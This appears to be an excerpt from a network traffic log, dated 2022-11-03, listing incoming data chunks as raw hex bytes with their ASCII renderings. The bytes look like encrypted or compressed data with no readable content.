a5HUq'$VX8/~@h.$"<r5JT/jj%2"u< :}`t<S#vR}AK(5gxN+:G?A}:sOu_rXw@Mh>^z;=-%4-EsV0+S)wYFaHlpp4id4
2022-11-03 06:22:07 UTC	40	IN	Data Raw: 2c 4f c6 8a c3 2c ce 90 22 42 75 a6 f2 b7 7b a1 8a 24 43 9d da 48 e5 3e 88 40 34 10 90 22 4f 59 70 54 58 0c 8b 5d de 1e a7 1d 44 76 c4 ab c3 fe c1 46 aa 7d 04 fc d8 b2 94 ff 8b 27 cb b1 75 59 94 c0 86 86 d1 20 18 0d fe 4d 6f 36 d9 99 7a 42 21 2e 0f 22 0d 42 41 cb 09 45 00 34 88 38 14 9e 7e e0 e2 e1 82 11 20 76 44 d4 27 61 ed af 01 83 1b 69 56 8d db 5e 9b 7b 9e f0 80 03 d6 4d d7 f7 a3 49 d2 3a d5 93 38 ec be 00 85 d2 2e 77 7d 9d 1a 4a fa 09 29 08 32 45 c0 c8 d9 2b de 63 b2 24 43 c1 bd 8f 7e b5 ce 9e 96 0a 7b a0 85 f5 26 f3 95 f6 0a 55 95 01 95 68 be 3c 17 be 63 e8 87 7b 1c 76 1d 36 61 81 5d e1 dd ee f2 c1 15 6c 35 d2 c9 48 2a ac b8 8e aa c2 35 bb 56 7d 87 d3 d7 22 c1 f8 07 b8 ca 22 ed 41 49 e1 1b eb ce 87 37 96 43 cc 09 8a 3c e6 2d 9d c4 7d b0 2e 0a 3b 17 Data Ascii: ,O,"Bu{$CH>@4"OYpTX]DvF}'uY Mo6zB!."BAE48~ vD'aiV^{MI:8.w}J)2E+c$C~{&Uh<c{v6a]l5H*5V}""AI7C<-}.;
2022-11-03 06:22:07 UTC	41	IN	Data Raw: b4 ba 12 1e 89 7f 23 1e c9 65 16 fd cb f4 5c ff e6 91 2f bf 83 10 7d 60 3e 94 a6 63 a2 b7 20 66 57 28 f3 c5 05 26 b0 4e fd ab 89 28 2f 3a 54 d0 bf 17 08 4b 8c 63 fc f6 28 47 e6 79 57 b8 4e ae fa 6d 80 33 ea aa 2a d8 25 87 14 db af 14 c1 c3 f1 49 d6 b3 27 f1 5e a7 c3 52 e1 4e 2f ba 73 48 37 7d 3b 3b 10 b2 42 bc d5 57 45 8f 29 cd 4e 68 b8 87 0d 57 74 e8 2f e1 f9 aa a4 06 e5 f5 52 17 38 40 c2 f0 4c 4a 21 41 22 7c 47 b2 5a c9 4b ec 3a 1d 4f fb 3e cf cf 0e a6 0c 7a 53 46 31 e8 cf 6d fb e2 58 c2 52 29 e6 79 35 a3 4d 06 79 b0 c4 e0 ea b2 c3 cb 51 f7 08 0a 5f c8 cb 25 0b 76 4a de d1 a6 f8 a2 43 30 31 e2 a1 8e b9 9d c8 59 10 eb 65 b6 e0 54 ff d2 01 fe 0b 77 03 54 29 01 14 b5 d8 35 68 eb cc 90 44 30 03 5f 48 04 a9 fe c9 97 ab a8 7e bb eb 4c 4b b4 cb 53 84 ff 8c 23 Data Ascii: #e\/}`>c fW(&N(/:TKc(GyWNm3*%I'^RN/sH7};;BWE)NhWt/R8@LJ!A"\|GZK:O>zSF1mXR)y5MyQ_%vJC01YeTwT)5hD0_H~LKS#
2022-11-03 06:22:07 UTC	42	IN	Data Raw: 27 fd bd 91 f7 67 89 f1 02 a5 27 60 bd 65 94 c3 d0 eb 00 b8 b3 10 c3 cb de 4f 47 c6 93 b7 87 ce 90 23 68 75 a4 e3 fc e0 a1 90 20 40 b5 51 48 e5 25 dc e2 1b c0 8c 1f 9d 5a 56 74 0c 0e 12 5d d4 32 df e4 44 73 80 09 c3 e1 c0 6c aa 7d 17 cc da b0 b6 84 12 27 c0 b5 76 60 32 4e a9 5c bb 32 e7 0d fc 57 54 b9 df bf 50 3e 90 7d 0e 26 20 c3 61 c8 39 4d 71 0b 88 38 15 b4 6d d0 e0 e3 9a 6a ba 76 4a d0 24 58 48 02 2e 59 71 7c a9 8d d9 4e c9 07 b8 d6 a0 56 1f 4c d7 f5 fc 1a d2 39 e4 b0 38 f3 ad 30 87 d2 34 77 7d 9f 16 31 60 18 09 47 1e bd 58 e0 26 21 aa 58 cc 5b 41 df 9a a4 0b 92 e4 e5 78 a1 7b a4 af 27 26 f0 b6 cf 08 4a b5 01 95 68 3a 3c 17 ad 41 f8 33 ab 02 5a e1 1e e4 87 4b 67 8b af f2 c0 3f 24 19 d1 e9 17 22 d1 23 8f db e4 1e 43 57 54 a4 ea d3 3d f4 f8 07 b8 4f 22 Data Ascii: 'g'`eOG#hu @QH%ZVt]2Dsl}'v`2N\2WTP>}& a9Mq8mjvJ$XH.Yq\|NVL9804w}1`GX&!X[Ax{'&Jh:<A3ZKg?$"#CWT=O"
2022-11-03 06:22:07 UTC	43	IN	Data Raw: 79 ea d4 98 b3 c4 24 3f 7c ff fa 01 15 07 ea 62 f1 a6 32 0c 3d c4 97 18 95 ef ad 41 1a da e4 12 14 e2 7b 7a 41 da fe c2 ee 90 47 3f ba e6 c5 c7 60 34 b8 a1 10 71 9d 35 42 28 8f d9 d4 0b 33 9b 8e f6 ba 89 44 8b b4 e3 e6 64 75 dd 5d d4 7a 87 57 2e 56 e5 f5 9b 29 39 51 01 90 ef ae f9 9a 2a ce 39 fc 89 db 22 10 ae 06 83 8e dd b1 56 43 73 b4 e1 56 b2 1c 2f ba 7d 48 23 a9 3a 3b 1e df f1 20 d5 5d 6b ea d6 27 4e 62 a9 cc a0 57 60 ec 2d c4 8a ad 3b 16 96 34 20 c2 33 56 e4 96 bc 4d 23 24 e8 06 e8 b8 70 c7 62 3c d7 2a d4 fa 13 c9 bc db 29 0c 70 2d e3 f7 e9 c5 65 98 7f 7a e4 50 29 ac 4e 33 3c 46 2e 67 c2 11 eb ca 51 8a cd 4e df fd 20 22 78 b5 5a 0f 4e 57 4e c6 59 85 1c 69 3a 1e 06 bd 71 46 71 85 eb 10 7a 61 8e c1 24 00 2d 0b cd 18 2e bc 0c a4 23 87 b5 d9 3c 47 84 43 Data Ascii: y$?\|b2=A{zAG?`4q5B(3Ddu]zW.V)9Q9"VCsV/}H#:; ]k'NbW`-;4 3VM#$pb<)p-ezP)N3<F.gQN "xZNWNYi:qFqza$-.#<GC
2022-11-03 06:22:07 UTC	45	IN	Data Raw: 3d d6 35 96 ee 15 73 ef 92 bd 3a 86 fb ab e3 e2 6b 0e 58 cf c8 cd 2c 57 e0 0f 7b b9 ba 2d 6e 6d f1 02 a3 1b 97 c3 eb b2 e9 a9 58 da ba cc ae 3b cb d9 74 49 ea 84 b0 85 d9 ff e7 69 75 a0 e3 e8 e7 a0 90 22 9d bb f1 60 a9 2f a8 d2 11 c2 f5 91 b0 59 74 5e 2e 5f 83 55 d6 30 9b d0 45 70 b6 02 ac 5d c1 6c ac 55 76 cc da b8 6a ff a1 27 c0 b5 74 58 b4 4e a9 56 cf 08 8d 67 fe 6d 3f ba f9 98 79 73 03 7d 4c 22 0b 3b 61 cb 09 44 73 08 94 15 0f 92 16 7d e0 e1 9c 13 36 63 67 c6 01 0b 63 02 2e 57 6a a1 a8 8d d1 75 c1 2f 98 d6 a1 cf a3 67 3b f3 c1 f4 fe 2e f2 bb 43 41 ad 30 83 d0 4f d9 7d 9d 10 25 65 19 09 45 36 96 f8 cb cc 01 de 65 d7 6b 46 c1 95 a5 2d b4 57 98 e2 b0 79 db 29 df 26 f7 aa cf 0a 2e 18 01 95 6c 39 12 12 72 48 81 a8 ab 06 31 03 37 61 8d 5d 2d 50 ef f2 c0 39 Data Ascii: =5s:kX,W{-nmX;tIiu"`/Yt^._U0Ep]lUvj'tXNVgm?ys}L";aDs}6cgc.Wju/g;.CA0O}%eE6ekF-Wy)&.l9rH17a]-P9
2022-11-03 06:22:07 UTC	46	IN	Data Raw: b5 d6 c3 59 82 a7 ba 79 30 78 fd 82 c8 3c 7a bd ef 5a 54 03 8c 63 19 93 78 5e cc d0 a5 0c e4 58 8b 7d e3 c4 d3 3d 01 ea 44 fc a7 26 75 db 70 97 1c 89 a3 bf 30 53 83 69 3a 16 99 ed 07 f6 de f3 cf c0 ee 9c 3c b8 97 0c 7c 60 30 d3 0e 62 a2 9a 1f 48 55 21 c2 e4 0b 31 60 5d f7 ba 18 39 24 a5 e1 99 c1 06 0e 58 f9 71 d0 e5 55 ec e1 f7 e4 9e 14 5e 23 95 bc 91 f9 9a 24 df 13 0e 14 db 28 3f c2 d9 a9 61 d5 c8 96 ec 73 b0 e6 3b 23 aa 2f b0 7b 31 e1 34 3a 3f 36 df 54 f0 d7 4a 76 a8 08 00 68 6a c4 15 0f 57 66 36 11 9c cd aa a4 13 bd c3 54 3f b8 56 ee f3 b6 92 0d 0b c2 31 47 b8 7a de 4d 14 0f 2f 30 60 13 cf cb 02 20 20 77 69 36 fc c2 3e 6f e1 c9 15 28 55 2b 8f b2 5b 00 46 2e 67 99 a5 ea ca 51 3b 1b 65 de eb 0a 5f cc b5 7e 0b 5a 10 b1 3e a6 f8 a8 69 3a 1a 37 a1 de e0 8e Data Ascii: Yy0x<zZTcx^X}=D&up0Si:<\|`0bHU!1`]9$XqU^#$(?as;#/{14:?6TJvhjWf6T?V1GzM/0` wi6>o(U+[F.gQ;e_~Z>i:7
2022-11-03 06:22:07 UTC	47	IN	Data Raw: 66 7d 5f c9 d4 21 53 70 f3 ea b9 e9 e2 3a 35 ea 6a a3 bb ab ac 90 da 9c dc 2b cb 18 b7 c8 33 71 fa f5 07 17 9b d9 ab 90 6f 47 14 78 98 42 e6 39 2e 52 1a 67 90 83 db 68 6f f1 02 a3 5f d5 bf 43 b4 c3 8b 58 e1 9e 9c df 1d e0 31 7f 4d f6 86 b7 88 ce 90 23 68 75 a6 e1 85 64 b7 bc 23 65 b5 95 48 e5 25 82 fe 30 37 8e 09 80 53 70 70 26 73 8b 5d d4 36 f4 1e 59 66 9c 17 e5 85 7d 6c aa 79 15 d0 c2 9f bb d9 f0 9b c0 b1 71 27 28 4f a9 50 e5 2e cc ea d8 60 96 ba f9 9a 4a 49 09 66 0e 22 0b 3b 61 cb 09 46 6f 0c a5 2b 33 91 93 d7 53 e0 98 17 53 6d 4b d4 21 1f d3 03 2e 55 2f 67 82 66 db 5b d5 00 9e bc 8a 2b 85 4c d7 f1 d7 e0 fa cf d5 b9 32 ee af 15 79 d5 fb 76 7d 9b 67 bc fb 18 03 6b ea 94 de ea 24 29 fb 9b cb 8b 42 c1 b1 d4 d5 b5 ce 92 ca 58 7a a0 8e f7 dc f2 86 cc 0a 4c Data Ascii: f}_!Sp:5j+3qoGxB9.Rgho_CX1M#hud#eH%07Spp&s]6Yf}lyq'(OP.`JIf";aFo+3SSmK!.U/gf[+L2yv}gk$)BXzL
2022-11-03 06:22:07 UTC	48	IN	Data Raw: 36 67 61 62 57 ae 67 49 74 65 1e 2d 88 37 5d 14 76 84 93 4e a8 d3 a5 3e d7 16 a5 8a fc 27 e6 9d 24 59 18 77 07 61 b7 12 ce 30 3e 1b 0b 68 f5 aa ec 9b 16 6c 47 5b ca d7 a3 5a ae c4 92 9b 21 06 88 e5 99 1b 93 7c 8e 13 8b b3 0b 9f 26 b4 ea c7 16 1f d5 b3 7c 18 bb 6b b0 79 4f cb ec 07 5d c4 ad 2f cd 85 f2 1c c0 f1 cb 2c 4b 06 28 34 be 8a 0b d8 9a 03 be ec 9e a0 b4 e3 c8 d2 f2 30 69 ce 52 37 41 36 b7 8e 42 6e f5 ac 6a 97 ba d9 d1 ee 31 42 30 fa 23 f2 f5 2a af 10 a7 cd 47 e4 b7 91 a4 b2 16 24 1a 76 08 03 30 1f 17 74 7c da b5 b3 18 06 b7 12 13 d0 26 52 9c 3e 0c 91 70 fc 59 68 13 2a 69 12 7b 6d 70 74 41 01 ec f7 96 47 59 8f af 7f 76 5b 3d 56 b5 f4 55 5d 57 96 8e 55 97 ba ec 5d 51 88 3d 0f 10 59 6f c4 95 46 ad 70 d9 5c 8d 0e d7 2f b5 52 bb 4f 7c c4 20 e2 2d d3 e4 Data Ascii: 6gabWgIte-7]vN>'$Ywa0>hlG[Z!\|&\|kyO]/,K(40iR7A6Bnj1B0#G$v0t\|&R>pYhi{mptAGYv[=VU]WU]Q=YoFp\/RO\| -
2022-11-03 06:22:07 UTC	49	IN	Data Raw: 7f cb 91 e2 98 71 cf 87 6b 7b 6e 9d 7e 2d 2c ee 1f 90 8d 68 a8 15 f3 f5 83 6b 9f 0a f4 d5 3e a7 3a 2c fd b2 26 42 ab 04 9d 3e c2 ef 08 a0 b7 8a ff d8 18 77 29 e1 d8 db 45 98 be 90 60 30 8b 8f d4 38 d5 ad 55 23 33 6c 06 7a 56 d5 cc d1 ed e4 fa aa 0f 57 dd 19 d0 7b 01 f8 56 0e 35 f2 f7 99 5b 6d 09 ca da 8b 18 fc b5 aa 34 b2 Data Ascii: qk{n~-,hk>:,&B>w)E`08U#3lzVW{V5[m4
2022-11-03 06:22:07 UTC	49	IN	Data Raw: 93 eb 0d c5 7b 5b d8 e4 2f 87 d7 58 4e 42 44 6a 34 0f 23 5e d5 30 c1 38 c0 fc 29 02 f6 f3 af 33 8c 08 8c 5e cf 9a 59 77 85 d3 09 4f 09 56 66 b4 00 d0 2f de 80 8b 3e 8d 2e 30 58 ff 2e db ce f7 ca 5b 01 c0 01 a5 ec b3 af d2 54 d5 4e 84 c2 26 31 81 26 b7 e1 3d d7 06 25 01 a5 5e 3b 03 e8 72 7c ff 97 f2 8a b5 a4 37 fd 37 50 09 81 6e c8 7d cd 40 e3 d1 96 c0 f6 d2 92 5d 71 50 ad f3 5c 40 77 3a e5 de c7 5f 38 22 b7 21 ea 3c e8 da 42 be c2 80 03 07 b6 18 08 2d ba da 23 f6 c7 f7 d4 dd 5d 02 ba 0f b5 ca 53 2d 2b b9 4b a2 20 f6 cb 4d 99 ce 08 02 e1 74 51 90 6e 50 70 3c 95 c4 24 28 40 4d c2 84 0f 6b 1d 4c 8b 2e dd f7 5b 28 59 51 4f f9 12 e8 37 e1 cf 2c d2 23 32 4f 11 df 3b 06 f3 a1 40 af b7 c0 91 2c a1 c4 b3 df 4c 33 78 0d 08 e6 45 fa 10 4c 5f e4 72 71 c4 8f 80 1c 62 Data Ascii: {[/XNBDj4#^08)3^YwOVf/>.0X.[TN&1&=%^;r\|77Pn}@]qP\@w:_8"!<B-#]S-+K MtQnPp<$(@MkL.[(YQO7,#2O;@,L3xEL_rqb
2022-11-03 06:22:07 UTC	51	IN	Data Raw: 63 13 f5 9c e7 04 26 80 be e9 bb 34 4d 20 da 62 91 03 31 43 6a 24 dd 45 fd 61 66 77 6a ac 90 e9 e5 ae 6d 5a 68 2d 03 42 c3 46 b1 ff 8d 9d 57 e0 88 fb d3 74 8b ea 78 5a d1 3f 22 4b 64 5c 4c 16 86 ec 87 41 62 ab 62 d9 32 de 11 3f df e3 35 90 ee b4 d6 08 95 ac c9 fc b5 74 85 98 0c 4a 92 51 9a 9b 77 ed e8 68 ab df 0d 5c e3 8b 20 57 8c 28 3d f0 23 c6 32 80 e3 06 66 de e5 e5 11 2a 1f 16 1b 47 84 f8 cf 60 d3 3c b3 a0 ff d7 9c de 5d 55 10 b8 ac d8 b2 d7 a6 dd 0c 77 e1 2d 62 8e f5 7e 41 12 e3 f8 8d 33 5a 6a c5 f9 0e 55 19 23 37 5f 4b c5 02 9b df de 5c 18 24 cf 5f 7e 6a 3f e9 13 71 27 59 90 88 b8 e1 b3 a6 c8 84 e2 5e 9e c8 18 31 35 3f f0 e8 cb de cf 08 f6 18 11 4d c0 8e c3 8e a0 e0 f5 3d 56 3f 4d a6 8c 0f df cd c9 60 84 d3 77 ce bc 13 91 bf 4e 30 c4 97 89 75 a7 41 Data Ascii: c&4M b1Cj$EafwjmZh-BFWtxZ?"Kd\LAbb2?5tJQwh\ W(=#2f*G`<]Uw-b~A3ZjU#7_K\$_~j?q'Y^15?M=V?M`wN0uA
2022-11-03 06:22:07 UTC	52	IN	Data Raw: 02 a5 30 4d bf 43 b2 e9 7d 73 00 b8 f0 3b 3b cb 0a 7f 4e c6 5c b6 87 ce 5c 22 68 75 a1 e1 87 79 5f 91 24 43 8b d4 48 e5 75 a8 d8 1b c1 8e 0a b0 5a 70 52 26 d3 8b 5d d4 34 f4 1c 44 74 b0 00 c3 fa c0 6c aa 67 17 cc da b7 b4 ff 8b 06 c0 b1 75 5b b4 4e a9 57 cf 08 e7 0b fe 4b 79 b8 f9 99 7a 5f 09 7d 0e 27 0b 3b 61 cd 09 44 71 16 88 38 15 b4 6d c1 e0 e0 98 11 20 76 4a de 27 82 cd 0b 2f 59 05 72 a8 84 da 52 e5 3c 9f b4 8b 21 85 27 d6 b5 d6 e8 d2 47 d5 fd 39 e6 ad b7 86 96 35 7d 7d 0e 15 0e fb 12 09 e8 1c d1 df ea 26 9a df df cd 51 43 19 b6 89 2d be ce 68 e3 8f 7b a6 84 d4 24 e7 84 c0 08 71 b7 15 97 7e 3a 0c 15 ea 41 95 a8 e5 00 07 e0 20 61 e8 49 34 fd f8 f2 bb 3f 66 36 c4 cf bb 0a 35 ba 99 db 53 37 22 55 41 94 20 d1 bb f6 ee 07 6e 4d bb ef 46 37 3a 19 72 c8 93 Data Ascii: 0MC}s;;N\\"huy_$CHuZpR&]4Dtlgu[NWKyz_}';aDq8m vJ'/YrR<!'G95}}&QC-h{$q~:A aI4?f65S7"UA nMF7:r
2022-11-03 06:22:07 UTC	53	IN	Data Raw: e7 ee 99 d6 13 07 4b 49 8e a4 36 77 08 c9 ce 1c 8b b5 0a 15 54 82 6f 30 d8 ef 23 07 f0 da 15 cb b5 e3 93 3e 4f e1 e1 7c 66 34 41 ae 3a a2 92 35 4a 5b 65 d9 da 0f 3f e6 19 f7 b4 83 2f 2a f0 e3 ec 66 25 00 18 d4 7e fa cf 20 12 e1 f9 e0 ba 37 15 05 9c 94 4c f7 de 2e d6 3b e2 1a 9f 22 1a c1 a2 8c ca d7 bd 2d 6e 7d f0 e5 5a c9 31 21 fe 79 44 58 9d 34 7f 1a dd 8a bd d5 e6 61 85 02 26 4e 69 ab b6 0e 57 61 e8 2f 25 7a aa a4 de 97 33 53 16 32 56 ef e9 6a b8 2d 2e ea b4 46 b9 70 c1 60 1c 28 2d 4b eb 1c cf cf c7 29 0a 7a 4a 35 f3 e8 cf 67 a3 c0 7a e4 9d 2a 8e b0 3e a3 42 2f 61 b1 98 e5 ca 5b 2c 1a 46 df e4 0a 5f cf b5 5a 73 79 40 b1 f0 a7 f1 a8 73 3a 1b 3f a1 8e 11 81 f8 5e d9 7b 6e b6 c1 db 7f d3 00 fd d8 21 14 0c 6d 22 1a b5 fa 2d 44 fe ea e3 8b 21 03 55 9b 28 a9 Data Ascii: KI6wTo0#>O\|f4A:5J[e?/f%~ 7L.;"-n}Z1!yDX4a&NiWa/%z3S2Vj-.Fp`(-K)zJ5gz>B/a[,F_Zsy@s:?^{n!m"-D!U(
2022-11-03 06:22:07 UTC	54	IN	Data Raw: 30 39 29 87 f9 a9 77 51 7d 0f 58 e3 f0 c2 22 2b 56 0f 70 9a 56 fd 05 c9 b5 2a ed 31 5b be 37 9a a3 ac 75 00 1c 9f 31 3a cd dd bf 66 79 8c b1 87 12 b8 e7 68 73 a6 19 af 76 a0 96 24 57 b4 db 49 e4 2f 78 f4 98 c1 8f 0a 5c 75 f7 53 27 73 83 70 7e 36 f5 1c 60 5d 3a 01 c2 fe 80 41 25 7c 16 cc 3e 9d 18 fe 8a 27 c0 81 c5 49 a2 4e 80 67 19 09 f1 0d bb 7a af bb ef 99 0f 72 e9 7c 18 22 9a 0a 8d ca 18 44 dc 25 4c 38 04 b4 b0 e1 24 e1 89 11 2d 44 8e d4 36 70 f0 30 ea 53 13 41 c4 bf 6b 59 f3 04 03 c2 20 2b 93 4c 1a c3 7d e2 c3 3a 29 8b cc ed bb 30 9e e1 3b 76 6b 9d 21 79 f5 19 1f 43 4c a6 d4 e1 30 2b 5f 56 35 5a 55 c1 2a 94 29 b6 d8 98 5b 92 76 a2 92 df f3 c0 8b c4 1e 55 44 32 84 6a 2b 3c 36 9b 49 82 be ab 3f 6a f4 34 77 87 12 59 55 ee e4 c0 48 0b 9e d2 d9 31 ad 98 c8 Data Ascii: 09)wQ}X"+VpV1[7u1:fyhsv$WI/x\uS'sp~6`]:A%\|>'INgzr\|"D%L8$-D6p0SAkY +L}:)0;vk!yCL0+_V5ZU)[vUD2j+<6I?j4wYUH1
2022-11-03 06:22:07 UTC	56	IN	Data Raw: 34 70 d3 9c 3b 26 36 b9 e8 75 c5 20 8f 67 1c fc db 5f 35 cc e5 3e e4 24 f7 5c e3 c0 d6 15 01 f2 b7 cd c3 30 75 a0 20 b6 1c 8d b5 ba 1e 0d 0b 72 4a 14 e0 7a 17 d4 da fe c6 ec e5 95 87 a1 6c b8 7e 60 50 9e a3 63 a2 9c 24 48 50 3d 5e d4 0c 31 7c 7e f7 ba 83 39 25 b4 b2 fe e9 06 0a 5c 00 53 fa e7 2e 56 a7 f5 7d 9b ae 51 00 92 94 3d f9 9a 2e d8 7d 85 d4 c7 be 14 c7 d2 9e aa d7 b3 2d ec f0 b4 29 48 69 ab 29 ba 4d 6e 58 34 3a 3b 5c df 62 a1 73 5d 69 85 52 02 4e 68 ab b7 08 4f 93 f2 48 e1 72 aa c8 33 96 32 53 17 74 54 73 e5 fd 4c 25 2e 72 59 47 b8 70 c3 26 1b e9 31 d7 fb 14 cf 7b 2a 28 0c 7a 42 b6 f6 e4 d2 c7 e3 c8 7a 28 70 2b 89 b0 34 e5 45 c6 7d 17 c4 ed ca b3 c1 1b 4f df f7 1b 5f e7 a8 dd 0b 71 40 a9 1c a6 f8 a8 69 3b 1a 4b bc 01 b9 86 f8 1a 35 7a 65 b6 e0 cd Data Ascii: 4p;&6u g_5>$\0u rJzl~`Pc$HP=^1\|~9%\S.V}Q=.}-)Hi)MnX4:;\bs]iRNhOHr32StTsL%.rYGp&1{*(zBz(p+4E}O_q@i;K5ze
2022-11-03 06:22:07 UTC	57	IN	Data Raw: b7 ec 82 f7 ff 01 33 c0 4c 88 41 ab f2 97 94 9c a3 2b b7 24 b7 c8 33 71 ee ef 97 0d b2 fd fd 8c 42 57 0e 5e e3 e7 f7 39 f3 67 4b 7b e8 91 f9 2c c9 f1 02 a7 26 4d b7 7b f6 e9 f8 73 24 f8 b7 3b 3b cb cc 7f 77 fe c8 b7 d2 ce 68 63 68 75 a6 e1 91 79 c8 a8 60 43 c8 d4 9c a4 2f a8 d8 1b d1 8e a7 88 1d 70 07 26 b7 c9 5d d4 36 f4 0d 44 ad 88 44 c3 ab c0 5c e9 7d 17 cc da a3 b4 f2 b2 63 c0 e4 75 98 f7 4e a9 56 cf 19 e7 30 c7 77 7b ef f9 79 3e 43 09 7d 0e 33 0b 56 58 7f 09 11 71 4c cd 38 15 b4 6d c1 e0 58 a1 a5 20 20 4a 94 61 70 cd 02 2e 42 05 44 93 cd d9 0f e5 e0 d8 f0 8a 2b 85 5d d7 c4 ed a6 d2 6d d4 51 7e ec ad 30 87 c3 34 12 47 d8 16 1d fa 34 4e 43 1d 95 de f1 26 b6 e4 2b ce 03 43 4d f0 a7 2d b4 ce 89 e2 50 41 e4 84 85 26 d3 ce c6 08 55 b5 10 95 5d 01 78 17 f5 Data Ascii: 3LA+$3qBW^9gK{,&M{s$;;whchuy`C/p&]6DD\}cuNV0w{y>C}3VXqL8mX Jap.BD+]mQ~04G4NC&+CM-PA&U]x
2022-11-03 06:22:07 UTC	58	IN	Data Raw: 54 1f 7c 62 21 94 d5 f3 b1 a7 4b 2c cd ce fa 71 68 b5 c7 c7 ae ae 3e b9 dc 34 f4 be 84 c8 3c 51 a8 ea 34 0c 45 8f c1 1c 30 b3 5f cc d6 8e 2f ee 55 6e 50 e0 66 d6 f5 6c ea 44 d7 a4 21 7f 39 95 d3 1c 2a b5 aa 74 0d 82 69 30 05 ea df 56 db d9 59 c6 c8 8f 95 3e ba ec a9 74 ad 65 f8 a3 cb a2 b0 59 48 55 21 d9 c5 07 e8 b9 70 f4 12 83 79 48 b4 e3 e2 66 17 06 b9 85 34 fa 4e 2e 56 e1 f7 e0 07 39 47 25 63 c5 2b fa 33 2e d8 3b 87 14 5b 22 02 e1 ef d0 b9 d4 19 2d ec 73 b4 e5 d4 c9 bd 0f d7 2b 71 5b 9e 3a 3b 1a dd 8a 3d d5 4b 4f 58 50 64 4d c5 ab b7 0e 57 60 68 2f f7 54 bf f7 50 95 9c 53 17 32 56 ee 79 6a 5a 03 ab b9 2d 44 09 70 c3 60 19 29 ad 4b ed 33 c6 9b 57 2b b8 7a 42 35 f6 e9 4f 67 f5 ef d3 b0 36 28 31 b0 34 a3 47 2e e1 b1 d2 ca b3 0e 88 18 f2 df f7 0a 5f ce 35 Data Ascii: T\|b!K,qh>4<Q4E0_/UnPflD!9*ti0VY>teYHU!pyHf4N.V9G%c+3.;["-s+q[:;=KOXPdMW`h/TPS2VyjZ-Dp`)K3W+zB5Og6(14G._5
2022-11-03 06:22:07 UTC	59	IN	Data Raw: 3e 47 25 c3 a3 37 d3 d0 57 81 86 22 01 b6 b1 5e 97 63 c7 5f 01 5b 52 48 71 f3 fa d6 de 8c 4a 31 d4 4d 7c d9 ab af a0 d0 8a f7 5e a4 5c b7 dd 32 7d 72 ef 1a 3a 86 ee b1 84 68 2e 0e 4b e2 b3 6a 39 2a 50 0f 6d bd a0 8d 69 cd e4 03 bb bd 4d be 43 b2 f8 ad 1a 70 3b b3 2d 3a cb dd 7f 4e c5 8c b1 9f 3d 8a cd 68 62 a7 e1 87 79 a1 93 24 05 9e 2a 69 6f 2b b1 d9 1b c0 8e 0a b3 59 36 51 a0 51 75 5d cf 37 f4 1c 44 70 b3 00 85 fd 00 4e cd 7d 0b cd b2 3f b4 ff 8b 27 c6 a9 86 52 27 4a b5 57 43 85 e7 0d fe 4b 1f b9 c1 a9 c5 42 14 7c fa af 0b 3b 61 cb 0f 44 a8 65 4d 39 0a b5 ed 5e e0 e1 98 11 46 75 a8 e4 1a 71 ec 03 fe dd 05 41 a9 8d bd 5b 0b 34 55 f1 a8 2a f5 c3 d7 f1 d7 e2 d4 22 27 a3 5f ec 8f 31 0b 5d 34 77 7d 9d 12 52 09 02 d7 43 3f 94 6e 6f 26 2b de 65 aa 58 83 e3 29 Data Ascii: >G%7W"^c_[RHqJ1M\|^\2}r:h.Kj9PmiMCp;-:N=hby$io+Y6QQu]7DpN}?'R'JWCKB\|;aDeM9^FuqA[4U*"'_1]4w}RC?no&+eX)
2022-11-03 06:22:07 UTC	61	IN	Data Raw: eb a6 3e 41 ce c9 ff 1c a6 cb cf a7 73 6f 55 ec ba d7 23 75 3f d7 51 a2 b0 51 52 7d 76 98 94 68 83 c1 a3 ef 2c a8 56 ff 3f 69 f5 79 c7 5b de 13 bc 79 78 fd 2c 81 87 3d 3d 16 ea 75 7d 01 89 67 98 71 21 5a 9c d7 16 91 e6 24 1f 7d e5 c0 06 98 07 ec 15 d6 60 9f 77 a0 e4 97 1a 8d a9 34 18 0b d0 68 c0 bb e2 7a 27 f6 dc fe ae 62 e4 93 6d bb f0 08 7c 60 14 bc a5 63 16 12 32 4e 01 20 91 64 0f 31 c8 5d f1 ba 83 b6 2a b2 b6 e3 12 b6 0e 5c f4 70 fc e7 62 d9 ef f1 b6 86 99 e1 05 92 b4 19 ff 9a b6 57 2e 81 43 da ee a4 c1 d2 a2 8e d1 b3 c9 63 66 b2 bd 55 31 1b 2f ba 79 4a 5e 34 0a ab 23 dc d3 bc c1 ec 6f 85 02 26 48 68 e7 27 23 56 39 e9 67 50 74 aa a4 17 90 32 d7 87 ae 56 b4 f8 0e fd 23 2e ea 7d 41 b8 d0 53 f8 18 73 2c e7 4a 13 cf cf 0e 2e 0c a2 d2 a9 f6 b2 ce af 52 cf Data Ascii: >AsoU#u?QQR}vh,V?iy[yx,==u}gq!Z$}`w4hz'bm\|`c2N d1]*\pbW.CcfU1/yJ^4#o&Hh'#V9gPt2V#.}ASs,J.R
2022-11-03 06:22:07 UTC	62	IN	Data Raw: 9e ee 28 21 e7 e4 b4 fc ad f0 5c d5 75 1a 82 b9 3f 83 dc 2d d1 67 f8 44 1f 03 2a 4f c1 b4 c5 55 b7 57 41 87 22 17 b6 6c 33 e7 27 d7 a0 e8 d8 55 8a 70 f3 ec d6 f7 e0 3a 75 c3 ca aa ae ab 69 a1 d0 9c f7 2b c8 18 f1 cb f3 53 e1 e8 dd 3b ae 3b a9 8c 72 6a 08 46 10 fd 81 39 e3 51 8f bf bd 91 fd 13 5f f1 0f 01 74 4d 77 42 26 2d ad 73 00 b8 b6 3b 29 6d f7 78 87 c7 24 73 87 ce 90 23 69 75 dc 47 b5 7e 6a 91 24 43 9c d4 b4 fd 2f a8 d9 1b 29 95 0a b0 58 70 67 3a 73 8b 5c d4 b7 e8 1c 44 71 b0 a4 df fe c0 6d aa 8c 0b cc da b3 b4 a6 96 27 c0 b0 75 ed a9 4e a9 57 cf 59 f9 0d fe 4a 79 27 e7 99 7a 42 09 94 10 22 0b 3a 61 fe 16 44 71 15 88 b9 0a b4 6d d1 e0 2c 87 11 20 77 4a 5d 07 70 cd 00 2e f6 25 41 a9 8e db 99 c5 04 9e f1 8a d2 a5 4c d7 f3 d7 cb f3 3a d4 b8 38 99 8c 30 Data Ascii: (!\u?-gD*OUWA"l3'Up:ui+S;;rjF9Q_tMwB&-s;)mx$s#iuG~j$C/)Xpg:s\Dqm'uNWYJy'zB":aDqm, wJ]p.%AL:80
